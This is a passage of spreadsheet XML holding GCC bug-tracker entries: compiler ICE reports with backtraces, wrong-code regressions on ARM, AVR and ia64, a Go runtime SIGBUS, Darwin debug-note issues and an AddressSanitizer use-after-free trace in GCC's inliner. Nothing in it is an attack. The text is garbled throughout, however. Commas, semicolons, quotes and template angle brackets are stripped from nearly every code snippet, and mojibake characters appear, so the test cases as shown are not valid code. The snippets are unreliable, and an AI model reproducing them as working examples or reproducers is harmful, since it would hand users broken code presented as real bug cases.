gawk: /home/sstewartgallus/root/var/src/gcc-6.2.0/gcc/opt-functions.awk:64: (FILENAME=- FNR=77) fatal: Invalid preceding regular expression: /^{/</t>
  </si>
  <si>
    <t>sstewartgallus00</t>
  </si>
  <si>
    <t>GCC-60223</t>
  </si>
  <si>
    <t>[c++11] ICE with C++11-style default template parameter</t>
  </si>
  <si>
    <t>The following valid code snippet (compiled with -std=c++11) triggers
an ICE since GCC 4.6.0:
==========================================
template struct A {}
template void foo(A) {}
void bar()
{
  foo(A())
}
==========================================
bug.cc: In substitution of 'template void foo(A) [with T = ]':
bug.cc:7:16:   required from here
bug.cc:7:16: internal compiler error: in unify at cp/pt.c:17895
   foo(A())
                ^
0x635440 unify
        ../../gcc/gcc/cp/pt.c:17895
0x634bf6 unify
        ../../gcc/gcc/cp/pt.c:17717
0x5525ad try_class_unification
        ../../gcc/gcc/cp/pt.c:16736
0x634775 unify
        ../../gcc/gcc/cp/pt.c:17753
0x6374e7 unify_one_argument
        ../../gcc/gcc/cp/pt.c:16161
0x639944 type_unification_real
        ../../gcc/gcc/cp/pt.c:16233
0x64265a fn_type_unification(tree_node* tree_node* tree_node* tree_node* const* unsigned int tree_node* unification_kind_t int bool bool)
        ../../gcc/gcc/cp/pt.c:15671
0x5addd1 add_template_candidate_real
        ../../gcc/gcc/cp/call.c:2973
0x5a9a7c add_template_candidate
        ../../gcc/gcc/cp/call.c:3070
0x5a9a7c add_candidates
        ../../gcc/gcc/cp/call.c:5131
0x5afee8 perform_overload_resolution
        ../../gcc/gcc/cp/call.c:3866
0x5b2bca build_new_function_call(tree_node* vec** bool int)
        ../../gcc/gcc/cp/call.c:3943
0x72e404 finish_call_expr(tree_node* vec** bool bool int)
        ../../gcc/gcc/cp/semantics.c:2348
0x6b2571 cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:6164
0x6b5116 cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:7170
0x6b5e3f cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:7874
0x6b6331 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:8112
0x6b86e4 cp_parser_expression
        ../../gcc/gcc/cp/parser.c:8274
0x6b8f1c cp_parser_expression
        ../../gcc/gcc/cp/parser.c:8313
0x6b8f1c cp_parser_expression_statement
        ../../gcc/gcc/cp/parser.c:9622
Please submit a full bug report [etc.]
Before GCC 4.6.0 the code was wrongly rejected.</t>
  </si>
  <si>
    <t>GCC-67452</t>
  </si>
  <si>
    <t>LTO ICE with -fopenmp-simd</t>
  </si>
  <si>
    <t>On the gomp-4_1-branch the libgomp.c/for-5.c and libgomp.c++/for-13.C testcases ICE with intelmic emul offloading I've reduced it down to -O2 -fopenmp-simd -flto on the following testcase:
float b[3][3]
__attribute__((used noinline)) void
foo ()
{
  int v1 v2
#pragma omp simd collapse(2)
  for (v1 = 0 v1 &lt; 3 v1++)
    for (v2 = 0 v2 &lt; 3 v2++)
      b[v1][v2] = 2.5
}
int
main ()
{
  asm volatile ( : : r (b) : memory)
  foo ()
  asm volatile ( : : r (b) : memory)
  return 0
}
The ICE is:
In function â€˜fooâ€™:
lto1: internal compiler error: in operator[] at vec.h:714
0x73a7a4 vec::operator[](unsigned int)
../../gcc/vec.h:714
0x73949c vec::operator[](unsigned int)
../../gcc/vec.h:1180
0xedf193 streamer_tree_cache_get_tree
../../gcc/tree-streamer.h:111
0xee3487 streamer_get_pickled_tree(lto_input_block* data_in*)
../../gcc/tree-streamer-in.c:1105
0xae9d42 lto_input_tree_1(lto_input_block* data_in* LTO_tags unsigned int)
../../gcc/lto-streamer-in.c:1428
0xae9f7b lto_input_tree(lto_input_block* data_in*)
../../gcc/lto-streamer-in.c:1474
0xee1da5 lto_input_ts_decl_minimal_tree_pointers
../../gcc/tree-streamer-in.c:689
0xee31c4 streamer_read_tree_body(lto_input_block* data_in* tree_node*)
../../gcc/tree-streamer-in.c:1046
0xae99b2 lto_read_tree_1
../../gcc/lto-streamer-in.c:1304
0xae9abd lto_read_tree
../../gcc/lto-streamer-in.c:1338
0xae9f12 lto_input_tree_1(lto_input_block* data_in* LTO_tags unsigned int)
../../gcc/lto-streamer-in.c:1457
0xae9b37 lto_input_scc(lto_input_block* data_in* unsigned int* unsigned int*)
../../gcc/lto-streamer-in.c:1362
0xae9f61 lto_input_tree(lto_input_block* data_in*)
../../gcc/lto-streamer-in.c:1472
0xae828a input_cfg
../../gcc/lto-streamer-in.c:863
0xae8e71 input_function
../../gcc/lto-streamer-in.c:1079
0xae9683 lto_read_body_or_constructor
../../gcc/lto-streamer-in.c:1232
0xae993c lto_input_function_body(lto_file_decl_data* cgraph_node* char const*)
../../gcc/lto-streamer-in.c:1278
0x7f4d60 cgraph_node::get_untransformed_body()
../../gcc/cgraph.c:3286
0x800c84 cgraph_node::expand()
../../gcc/cgraphunit.c:1892
0x801395 expand_all_functions
../../gcc/cgraphunit.c:2056
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
lto-wrapper: fatal error: ./xgcc returned 1 exit status
compilation terminated.
/usr/bin/ld: lto-wrapper failed
collect2: error: ld returned 1 exit status
The problem is that early optimizations eliminate simduid.3 uses and during release_ssa pass it is removed from cfun-&gt;local_decls but remains in loop-&gt;simduid and the LTO streaming doesn't expect to have trees streamed too late (during output_cfg) apparently.</t>
  </si>
  <si>
    <t>GCC-15429</t>
  </si>
  <si>
    <t>internal compiler error: in emit_move_insn_1 at expr.c:3510</t>
  </si>
  <si>
    <t>I get the error internal compiler error: in emit_move_insn_1 at 
expr.c:3510 when trying to compile: 
--------START CODE (dummy.c)---------- 
void dummy (int value void* arg) 
{ 
    long __pu_err 
    __asm__ __volatile__( 
		1:	movl %%eax0(%2)\n  
		2:	movl %%edx4(%2)\n 
		: =r(__pu_err) : 
		A (((__typeof__(*(arg)))(value)))  
		r (((arg))) i(-14) 0(__pu_err) 
		) 
} 
----------END CODE (dummy.c)---------- 
Try to compile with gcc -c dummy.c 
(this is actually the affected part of the expansion of the macro 
__put_user(value (void*) arg)(*) which is part of linux (the kernel). Note 
that this call is wrong (it should be (int*) arg in which case everything 
works ok. The same for the dummy function if we declare int* arg)) 
(*) in header  
This internal error seems to affect all gcc versions. 
gcc (GCC) 3.3.3 (Debian 20040306) 
2.95.4 (error is Internal compiler error in `emit_move_insn_1' at 
expr.c:2835)</t>
  </si>
  <si>
    <t>jgeorgal</t>
  </si>
  <si>
    <t>GCC-61498</t>
  </si>
  <si>
    <t>[4.10 regression] Many 64-bit Go tests SEGV in scanblock</t>
  </si>
  <si>
    <t>Between 20140606 (r211315) and 20140612 (r211522) many 64-bit Go tests started 
to FAIL on 64-bit Solaris 11/SPARC:
FAIL: go.go-torture/execute/array-2.go execution  -O0 
unexpected fault address 0xc208213b0c
fatal error: fault
[signal 0xa code=0x1 addr=0xc208213b0c]
runtime stack:
runtime_dopanic
        /vol/gcc/src/hg/trunk/local/libgo/runtime/panic.c:133
runtime_throw
        /vol/gcc/src/hg/trunk/local/libgo/runtime/panic.c:167
sig_panic_info_handler
        /vol/gcc/src/hg/trunk/local/libgo/runtime/go-signal.c:294
        :0
scanblock
        /vol/gcc/src/hg/trunk/local/libgo/runtime/mgc0.c:1048
markroot
        /vol/gcc/src/hg/trunk/local/libgo/runtime/mgc0.c:1405
runtime.parfordo
        /vol/gcc/src/hg/trunk/local/libgo/runtime/parfor.c:112
gc
        /vol/gcc/src/hg/trunk/local/libgo/runtime/mgc0.c:2282
mgc
        /vol/gcc/src/hg/trunk/local/libgo/runtime/mgc0.c:2225
runtime_mstart
        /vol/gcc/src/hg/trunk/local/libgo/runtime/proc.c:1026
main
        /vol/gcc/src/hg/trunk/local/libgo/runtime/go-main.c:43
        :0
goroutine 16 [garbage collection]:
created by main
        /vol/gcc/src/hg/trunk/local/libgo/runtime/go-main.c:42
goroutine 17 [runnable]:created by runtime_main
        /vol/gcc/src/hg/trunk/local/libgo/runtime/proc.c:561
Running it under gdb reveals
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 1 (LWP 1)]
scanblock (wbuf= keepworking=keepworking@entry=0 '\000')
    at /vol/gcc/src/hg/trunk/local/libgo/runtime/mgc0.c:1048
1048                                    obj = *(byte**)stack_top.b
1: x/i $pc
=&gt; 0xfffffffb998a230c :  ldx  [ %i5 ] %g1
(gdb) where
#0  scanblock (wbuf= keepworking=keepworking@entry=0 '\000')
    at /vol/gcc/src/hg/trunk/local/libgo/runtime/mgc0.c:1048
#1  0xfffffffb998a2cf4 in markroot (desc= i=)
    at /vol/gcc/src/hg/trunk/local/libgo/runtime/mgc0.c:1405
#2  0xfffffffb998a7d98 in runtime.parfordo (desc=0xc208428000)
    at /vol/gcc/src/hg/trunk/local/libgo/runtime/parfor.c:112
#3  0xfffffffb998a4a68 in gc (args=)
    at /vol/gcc/src/hg/trunk/local/libgo/runtime/mgc0.c:2282
#4  mgc (gp=0xc208002800)
    at /vol/gcc/src/hg/trunk/local/libgo/runtime/mgc0.c:2225
#5  0xfffffffb998ac120 in runtime_mstart (mp=0xfffffffb9a007290 )
    at /vol/gcc/src/hg/trunk/local/libgo/runtime/proc.c:1026
#6  0x0000000100001784 in main (argc= argv=0xffffffff7ffff2f8)
    at /vol/gcc/src/hg/trunk/local/libgo/runtime/go-main.c:43
#7  0x000000010000121c in _start ()
and truss shows that it's an address alignment error:
/1:         Incurred fault #5 FLTACCESS  %pc = 0xFFFFFFFB998A230C
/1:           siginfo: SIGBUS BUS_ADRALN addr=0xC208213B0C
/1:         Received signal #10 SIGBUS [caught]
/1:           siginfo: SIGBUS BUS_ADRALN addr=0xC208213B0C
  Rainer</t>
  </si>
  <si>
    <t>GCC-53453</t>
  </si>
  <si>
    <t>darwin linker expects both AT_name and AT_comp_dir debug notes</t>
  </si>
  <si>
    <t>Future versions of dsymutil on darwin will emit warnings of the form...
warning: no debug symbols in executable (-arch x86_64)
warning: no debug symbols in executable (-arch i386)
when the debug note for AT_comp_dir is missing from linked object files. Upstream had the following comments...
------------------------------------------------------------------------
The issue is not directly dsymutil.  The way it works on darwin is that 
the linker does not copy dwarf debug info.  Instead the linker leaves 
the debug info in the .o files and then puts debug notes into the final 
linked image. If you run the program under gdb the debugger sees the 
notes and opens the .of files and reads the dwarf. If instead you run 
dysmtuil it reads the debug notes which tells it where to find the 
.o files from which to read the dwarf and merge all the dwarf into 
the .dSYM.
The dsymtuil warning is that no dwarf was found.  In this case that 
is because there were no debug notes recorded by the linker which 
was because of the lack of AT_comp_dir.   In some of the cases you've 
set up there was no warning because there was some dwarf found but 
not all dwarf was found so the .dSYM is less than ideal.
The format of the debug notes requires a pair of dir/file.  Because 
it always just worked before the linker just copied the dir from 
AT_comp_dir and the file from AT_name. It does not look like the 
dwarf spec requires the AT_comp_dir but it has always been there 
before and the linker has come to depend on it.
-------------------------------------------------------------------------
This issue can be demonstrated with Xcode 4.2 under 10.7.4 using gcc trunk...
howarth% gcc-fsf-4.8 /sw/src/fink.build/gcc48-4.8.0-1000/gcc-4.8-20120520/gcc/testsuite/gcc.c-torture/execute/builtins/20010124-1.c /sw/src/fink.build/gcc48-4.8.0-1000/gcc-4.8-20120520/gcc/testsuite/gcc.c-torture/execute/builtins/20010124-1-lib.c /sw/src/fink.build/gcc48-4.8.0-1000/gcc-4.8-20120520/gcc/testsuite/gcc.c-torture/execute/builtins/lib/main.c -fno-diagnostics-show-caret --save-temps -w -O3 -g -lm -m64 -o 20010124-1.x4
howarth% dwarfdump --debug-info main.o | grep -A3 AT_language
             AT_language( DW_LANG_C89 )
             AT_name( /sw/src/fink.build/gcc48-4.8.0-1000/gcc-4.8-20120520/gcc/testsuite/gcc.c-torture/execute/builtins/lib/main.c )
             AT_stmt_list( 0x00000000 )
whereas if you copy or symlink the source files into a local directory and
compile with...
howarth% gcc-fsf-4.8 20010124-1.c 20010124-1-lib.c main.c -fno-diagnostics-show-caret --save-temps -w -O3 -g -lm -m64 -o 20010124-1.x4
...both the AT_name and AT_comp_dir debug notes are present...
howarth% dwarfdump --debug-info main.o | grep -A3 AT_language                                                  AT_language( DW_LANG_C89 )
             AT_name( main.c )
             AT_comp_dir( /Users/howarth/xcode44_bugv2/good_binary )
             AT_stmt_list( 0x00000000 )
and future dsymutil releases won't emit the warning.</t>
  </si>
  <si>
    <t>GCC-38109</t>
  </si>
  <si>
    <t>[avr] Wrong code with gcc.c-torture/execute/20081112-1.c</t>
  </si>
  <si>
    <t>Using version 4.4.0 20081112 (experimental) [trunk revision 141785]
compiling gcc.c-torture/execute/20081112-1.c (new regression) test fails for:
atmega128-sim: gcc.c-torture/execute/20081112-1.c execution  -O2 
atmega128-sim: gcc.c-torture/execute/20081112-1.c execution  -O3 -fomit-frame-pointer 
atmega128-sim: gcc.c-torture/execute/20081112-1.c execution  -O3 -g 
atmega128-sim: gcc.c-torture/execute/20081112-1.c execution  -Os 
Wrong code is generated for -O[23s] but is generated correctly for -O[01].
Attachments to follow.</t>
  </si>
  <si>
    <t>GCC-10842</t>
  </si>
  <si>
    <t>[3.3 regression] [arm] Clobbered link register is copied to pc under certain circumstances</t>
  </si>
  <si>
    <t>Compiling the attached code with -O3 -fno-inline-functions produces assembly that exhibits the following behaviour:
functionA branches with link to functionB.
functionB clobbers the link register and branches to functionC.
functionC returns with mov pc lr but lr is no longer valid.
When compiling with -O2 the link register is not used as a scratch register in functionB and hence the mov pc lr used by functionC works as expected.
This appears to be a regression from 3.2.1 (has not been tested with 3.2.2).
Release:
gcc version 3.3
Environment:
Host: FreeBSD 4.7-STABLE
Target: arm-elf
Configured with: ../configure --host=i386-unknown-freebsd4.7 --program-prefix=arm-elf- --target=arm-elf --disable-threads --with-cpu=arm7tdmi --enable-languages=c
How-To-Repeat:
arm-elf-gcc -O3 -fno-inline-functions -save-temps -c gcc33bug.i</t>
  </si>
  <si>
    <t>zhenya</t>
  </si>
  <si>
    <t>GCC-44253</t>
  </si>
  <si>
    <t>libdecnumber .o vs. obj =&gt; @OBJEXT@</t>
  </si>
  <si>
    <t>alpha64-dec-vms-ar cru libdecnumber.a decNumber.o decContext.o decimal32.o decimal64.o decimal128.o 
alpha64-dec-vms-ar: decNumber.o: No such file or directory
make[2]: *** [libdecnumber.a] Error 1
make[1]: *** [all-libdecnumber] Error 2
make: *** [all] Error 2
The usual .o vs. obj =&gt; @OJBEXT.</t>
  </si>
  <si>
    <t>GCC-4541</t>
  </si>
  <si>
    <t>raw_storage_iterator::operator= should call _Construct not construct</t>
  </si>
  <si>
    <t>In bits/stl_raw_storage_iter.h raw_storage_iterator includes an operator= that is attempting to call `construct'.  It should actually be calling `_Construct' as offered by stl_construct.h.
Release:
CVS tree</t>
  </si>
  <si>
    <t>GCC-81293</t>
  </si>
  <si>
    <t>sanitized g++ crashes heap-use-after-free gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors_format.inc:543 in printf_common</t>
  </si>
  <si>
    <t>// in trunk 249883
// from devirt-45.C
// compile with -fdump-ipa-inline-details -fno-early-inlining -O2 
// SUMMARY: AddressSanitizer: heap-use-after-free ../../../../gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors_format.inc:543 in printf_common
struct A {
  virtual int foo () {return 1}
  int wrapfoo () {foo()}
  A() {wrapfoo()}
}
inline void* operator new(__SIZE_TYPE__ s void* buf) throw() {
   return buf
}
struct B:A {virtual int foo () {return 2}}
static void
test (struct A *a)
{
  static_cast(a)-&gt;~B()
  new(a) B()
}
main()
{
  struct B a
  test (
}
/*=================================================================
==10147==ERROR: AddressSanitizer: heap-use-after-free on address 0x602000072470 at pc 0x2b6feac184fb bp 0x7ffcd9ff38e0 sp 0x7ffcd9ff3090
READ of size 2 at 0x602000072470 thread T0
    #0 0x2b6feac184fa in printf_common ../../../../gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors_format.inc:543
    #1 0x2b6feac534ff in __asan::ErrorDescription::Print() ../../../../gcc/libsanitizer/asan/asan_errors.h:360
    #2 0x2b6feac534ff in __asan::ScopedInErrorReport::~ScopedInErrorReport() ../../../../gcc/libsanitizer/asan/asan_report.cc:167
    #3 0x2b6feac534ff in __asan::ReportGenericError(unsigned long unsigned long unsigned long unsigned long bool unsigned long unsigned int bool) ../../../../gcc/libsanitizer/asan/asan_report.cc:397
    #4 0x2b6feac1832b in printf_common ../../../../gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors_format.inc:543
    #5 0x2b6feac1925b in __interceptor_vfprintf ../../../../gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1328
    #6 0x2b6feac19326 in __interceptor_fprintf ../../../../gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1373
    #7 0x53ab70c in inline_small_functions ../../gcc/gcc/ipa-inline.c:2048
    #8 0x53b10a5 in ipa_inline ../../gcc/gcc/ipa-inline.c:2429
    #9 0x53b3fb8 in execute ../../gcc/gcc/ipa-inline.c:2835
    #10 0x2833dc7 in execute_one_pass(opt_pass*) ../../gcc/gcc/passes.c:2492
    #11 0x28384cc in execute_ipa_pass_list(opt_pass*) ../../gcc/gcc/passes.c:2927
    #12 0x178ae2d in ipa_passes ../../gcc/gcc/cgraphunit.c:2388
    #13 0x178be18 in symbol_table::compile() ../../gcc/gcc/cgraphunit.c:2474
    #14 0x178cec5 in symbol_table::finalize_compilation_unit() ../../gcc/gcc/cgraphunit.c:2633
    #15 0x2dbbe22 in compile_file ../../gcc/gcc/toplev.c:493
    #16 0x2dc3f8a in do_compile ../../gcc/gcc/toplev.c:2021
    #17 0x2dc49aa in toplev::main(int char**) ../../gcc/gcc/toplev.c:2155
    #18 0x56b3cbe in main ../../gcc/gcc/main.c:39
    #19 0x2b6fed475400 in __libc_start_main (/usr/lib64/libc.so.6+0x20400)
    #20 0x78a619 in _start (/home/vitti/1tb/vitti/local/gcc-249691-sanitized/libexec/gcc/x86_64-pc-linux-gnu/8.0.0/cc1plus+0x78a619)
0x602000072470 is located 0 bytes inside of 7-byte region [0x6020000724700x602000072477)
freed by thread T0 here:
    #0 0x2b6feac49088 in __interceptor_free ../../../../gcc/libsanitizer/asan/asan_malloc_linux.cc:45
    #1 0x11611c1 in cxx_printable_name_internal ../../gcc/gcc/cp/tree.c:2544
    #2 0x116153a in cxx_printable_name(tree_node* int) ../../gcc/gcc/cp/tree.c:2555
    #3 0x16fbf9e in symtab_node::name() const ../../gcc/gcc/symtab.c:522
    #4 0x53ab69b in inline_small_functions ../../gcc/gcc/ipa-inline.c:2048
    #5 0x53b10a5 in ipa_inline ../../gcc/gcc/ipa-inline.c:2429
    #6 0x53b3fb8 in execute ../../gcc/gcc/ipa-inline.c:2835
    #7 0x2833dc7 in execute_one_pass(opt_pass*) ../../gcc/gcc/passes.c:2492
    #8 0x28384cc in execute_ipa_pass_list(opt_pass*) ../../gcc/gcc/passes.c:2927
    #9 0x178ae2d in ipa_passes ../../gcc/gcc/cgraphunit.c:2388
    #10 0x178be18 in symbol_table::compile() ../../gcc/gcc/cgraphunit.c:2474
    #11 0x178cec5 in symbol_table::finalize_compilation_unit() ../../gcc/gcc/cgraphunit.c:2633
    #12 0x2dbbe22 in compile_file ../../gcc/gcc/toplev.c:493
    #13 0x2dc3f8a in do_compile ../../gcc/gcc/toplev.c:2021
    #14 0x2dc49aa in toplev::main(int char**) ../../gcc/gcc/toplev.c:2155
    #15 0x56b3cbe in main ../../gcc/gcc/main.c:39
    #16 0x2b6fed475400 in __libc_start_main (/usr/lib64/libc.so.6+0x20400)
previously allocated by thread T0 here:
    #0 0x2b6feac493aa in __interceptor_malloc ../../../../gcc/libsanitizer/asan/asan_malloc_linux.cc:62
    #1 0x595d890 in xmalloc ../../gcc/libiberty/xmalloc.c:147
    #2 0x595db2f in xstrdup ../../gcc/libiberty/xstrdup.c:34
    #3 0x1161200 in cxx_printable_name_internal ../../gcc/gcc/cp/tree.c:2546
    #4 0x116153a in cxx_printable_name(tree_node* int) ../../gcc/gcc/cp/tree.c:2555
    #5 0x16fbf9e in symtab_node::name() const ../../gcc/gcc/symtab.c:522
    #6 0x16fc01c in symtab_node::get_dump_name(bool) const ../../gcc/gcc/symtab.c:529
    #7 0x16fc11f in symtab_node::dump_name() const ../../gcc/gcc/symtab.c:541
    #8 0x53a1ce1 in update_edge_key ../../gcc/gcc/ipa-inline.c:1232
    #9 0x53a304d in update_caller_keys ../../gcc/gcc/ipa-inline.c:1339
    #10 0x53ab078 in inline_small_functions ../../gcc/gcc/ipa-inline.c:2035
    #11 0x53b10a5 in ipa_inline ../../gcc/gcc/ipa-inline.c:2429
    #12 0x53b3fb8 in execute ../../gcc/gcc/ipa-inline.c:2835
    #13 0x2833dc7 in execute_one_pass(opt_pass*) ../../gcc/gcc/passes.c:2492
    #14 0x28384cc in execute_ipa_pass_list(opt_pass*) ../../gcc/gcc/passes.c:2927
    #15 0x178ae2d in ipa_passes ../../gcc/gcc/cgraphunit.c:2388
    #16 0x178be18 in symbol_table::compile() ../../gcc/gcc/cgraphunit.c:2474
    #17 0x178cec5 in symbol_table::finalize_compilation_unit() ../../gcc/gcc/cgraphunit.c:2633
    #18 0x2dbbe22 in compile_file ../../gcc/gcc/toplev.c:493
    #19 0x2dc3f8a in do_compile ../../gcc/gcc/toplev.c:2021
    #20 0x2dc49aa in toplev::main(int char**) ../../gcc/gcc/toplev.c:2155
    #21 0x56b3cbe in main ../../gcc/gcc/main.c:39
    #22 0x2b6fed475400 in __libc_start_main (/usr/lib64/libc.so.6+0x20400)
SUMMARY: AddressSanitizer: heap-use-after-free ../../../../gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors_format.inc:543 in printf_common
Shadow bytes around the buggy address:
  0x0c0480006430: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd
  0x0c0480006440: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa
  0x0c0480006450: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c0480006460: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c0480006470: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
=&gt;0x0c0480006480: fa fa 00 04 fa fa fd fd fa fa fd fd fa fa[fd]fa
  0x0c0480006490: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c04800064a0: fa fa 07 fa fa fa 00 03 fa fa fd fd fa fa fd fd
  0x0c04800064b0: fa fa 00 06 fa fa 07 fa fa fa fa fa fa fa fa fa
  0x0c04800064c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c04800064d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==10147==ABORTING</t>
  </si>
  <si>
    <t>GCC-56987</t>
  </si>
  <si>
    <t>gcc/config/avr/avr.opt:80: change -&gt; changed?</t>
  </si>
  <si>
    <t>Translatable string:
gcc/config/avr/avr.opt:80:
Warn if the address space of an address is change. -&gt; changed?</t>
  </si>
  <si>
    <t>stigge</t>
  </si>
  <si>
    <t>GCC-17437</t>
  </si>
  <si>
    <t>[4.0 Regression] obscure GC problem</t>
  </si>
  <si>
    <t>Compile the attached test case with -O3 and you get this: 
Program received signal SIGSEGV Segmentation fault. 
0x000000000090e182 in lookup_page_table_entry (p=0x14) at ../../mainline/gcc/
ggc-page.c:581 
581       while (table-&gt;high_bits != high_bits) 
$ ../build/gcc/xgcc -c -B../build/gcc/ -O3 -v t.i 
Reading specs from ../build/gcc/specs 
Configured with: ../mainline/configure --disable-nls --disable-multilib 
--disable-libmudflap --enable-languages=c 
Thread model: posix 
gcc version 4.0.0 20040912 (experimental) 
 ../build/gcc/cc1 -fpreprocessed t.i -quiet -dumpbase t.i -mtune=k8 -auxbase t 
-O3 -version -o /tmp/ccpw2dgs.s 
GNU C version 4.0.0 20040912 (experimental) (x86_64-unknown-linux-gnu) 
        compiled by GNU C version 3.3.3 (SuSE Linux). 
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096 
t.i: In function `live_out_1': 
t.i:14236: internal compiler error: Segmentation fault 
Of course I don't have a smaller test case and the bug does not reproduce 
with a gcac enabled compiler.  GC problems *sigh*.</t>
  </si>
  <si>
    <t>GCC-83714</t>
  </si>
  <si>
    <t>[8 Regression] ICE in build_address at cp/typeck.c:5733</t>
  </si>
  <si>
    <t>Starting from r218879 we ICE on:
$ cat hell2.ii
class a {
  typedef int b
  operator b()
}
struct c {
  using d = a
}
using e = c
auto f(auto) -&gt; e {
  return e::d {}
}
$ g++ hell2.ii 
hell2.ii: In function â€˜e f(auto:1)â€™:
hell2.ii:10:16: internal compiler error: in build_address at cp/typeck.c:5733
   return e::d {}
                ^
0x85b2e1 build_address(tree_node*)
	../../gcc/cp/typeck.c:5733
0x62d460 add_function_candidate
	../../gcc/cp/call.c:2158
0x62ed6f add_candidates
	../../gcc/cp/call.c:5516
0x629e63 add_candidates
	../../gcc/cp/call.c:3840
0x629e63 build_user_type_conversion_1
	../../gcc/cp/call.c:3841
0x62b854 implicit_conversion
	../../gcc/cp/call.c:1889
0x627253 perform_implicit_conversion_flags(tree_node* tree_node* int int)
	../../gcc/cp/call.c:10516
0x874f21 check_return_expr(tree_node* bool*)
	../../gcc/cp/typeck.c:9346
0x81a4ae finish_return_stmt(tree_node*)
	../../gcc/cp/semantics.c:890
0x76c7ac cp_parser_jump_statement
	../../gcc/cp/parser.c:12335
0x76c7ac cp_parser_statement
	../../gcc/cp/parser.c:10752
0x76d0c0 cp_parser_statement_seq_opt
	../../gcc/cp/parser.c:11185
0x76d197 cp_parser_compound_statement
	../../gcc/cp/parser.c:11139
0x785d20 cp_parser_function_body
	../../gcc/cp/parser.c:21679
0x785d20 cp_parser_ctor_initializer_opt_and_function_body
	../../gcc/cp/parser.c:21716
0x7864b0 cp_parser_function_definition_after_declarator
	../../gcc/cp/parser.c:26620
0x78717d cp_parser_function_definition_from_specifiers_and_declarator
	../../gcc/cp/parser.c:26536
0x78717d cp_parser_init_declarator
	../../gcc/cp/parser.c:19405
0x78f4ac cp_parser_simple_declaration
	../../gcc/cp/parser.c:12968
0x7903f8 cp_parser_block_declaration
	../../gcc/cp/parser.c:12793</t>
  </si>
  <si>
    <t>GCC-46386</t>
  </si>
  <si>
    <t>negative shift count in build_constants_constructor for 16 bit pointer targets</t>
  </si>
  <si>
    <t>Currently we can't compile java/constants.c with -Werror for any target
with 16 bit pointers - such as h8300 m32c m68hc11 pdp11 or stormy16 -
because of a negative shift in build_constants_constructor.</t>
  </si>
  <si>
    <t>GCC-24983</t>
  </si>
  <si>
    <t>Needs a warning?</t>
  </si>
  <si>
    <t>struct foo { const void f() }
void foo::f(){}
gets you:
~/ootbc/members/src$ g++ foo.cc -Wall
foo.cc:2: error: prototype for `void foo::f()' does not match any in class `foo'
foo.cc:1: error: candidate is: const void foo::f()
foo.cc:2: error: `void foo::f()' and `const void foo::f()' cannot be overloaded
Comeau gives a warning on the declaration and one error (not two) on the definition.</t>
  </si>
  <si>
    <t>GCC-28222</t>
  </si>
  <si>
    <t>[ecj] Fails compiling gnu/java/security/x509/X509Certificate.java</t>
  </si>
  <si>
    <t>The gcj-eclipse branch fails compiling the gnu/java/security/x509/X509Certificate.java file
as part of the build.
Output and assembler files are attached.</t>
  </si>
  <si>
    <t>GCC-10034</t>
  </si>
  <si>
    <t>Internal compiler error: Error reporting routines re-entered.</t>
  </si>
  <si>
    <t>Internal compiler error: Error reporting routines re-entered.
Release:
gcc version 3.2.3 20030228 (Debian prerelease)
Environment:
Debian unstable Dual Processor Athlon XP stock 2.4.20 kernel</t>
  </si>
  <si>
    <t>jwb235</t>
  </si>
  <si>
    <t>GCC-66660</t>
  </si>
  <si>
    <t>[ia64] Speculative load not checked before use leading to a NaT Consumption Vector interruption</t>
  </si>
  <si>
    <t>Created attachment 35848
Reproducible test case.
I hit what appears to be a bug in handling speculative loads on Itanium in GCC 5.1.0. I am going to attach a simplified testcase derived from the latest HelenOS sources which reproduces the issue.
In the Ski IA-64 simulator running HelenOS I can see the following sequence of events wrt. r23:
 4407ff0:       09 b0 00 00 00 21       [MMI]       mov r22=r0
 4407ff6:       70 01 88 70 20 00                   ld8.s r23=[r34]     &lt;===== speculative load sets the NaT bit for r23
 4407ffc:       e0 08 2a 00                         mov.i ar.lc=14
 4408000:       02 00 00 00 01 00       [MII]       nop.m 0x0
 4408006:       60 01 58 22 00 00                   zxt2 r22=r22
 440800c:       82 78 20 79                         shl r16=r8r15
 4408010:       03 00 00 00 01 00       [MII]       nop.m 0x0
 4408016:       f0 78 38 80 3c e0                   shr.u r15=r14r15
 440801c:       01 78 44 00                         zxt2 r15=r15
 4408020:       18 70 fc 21 3f 23       [MMB]       adds r14=-1r16
 4408026:       00 78 74 10 23 00                   st2 [r29]=r15
 440802c:       00 00 00 20                         nop.b 0x0
 4408030:       01 00 50 34 98 11       [MII]       st8 [r26]=r20
 4408036:       50 11 3c 3c 29 60                   extr.u r21=r15131
 440803c:       12 78 b0 80                         and r19=1r15
 4408040:       0b c8 64 1c 0c 20       [MMI]       and r25=r25r14
 4408046:       00 00 00 02 00 c0                   nop.m 0x0
 440804c:       01 c8 44 00                         zxt2 r14=r25
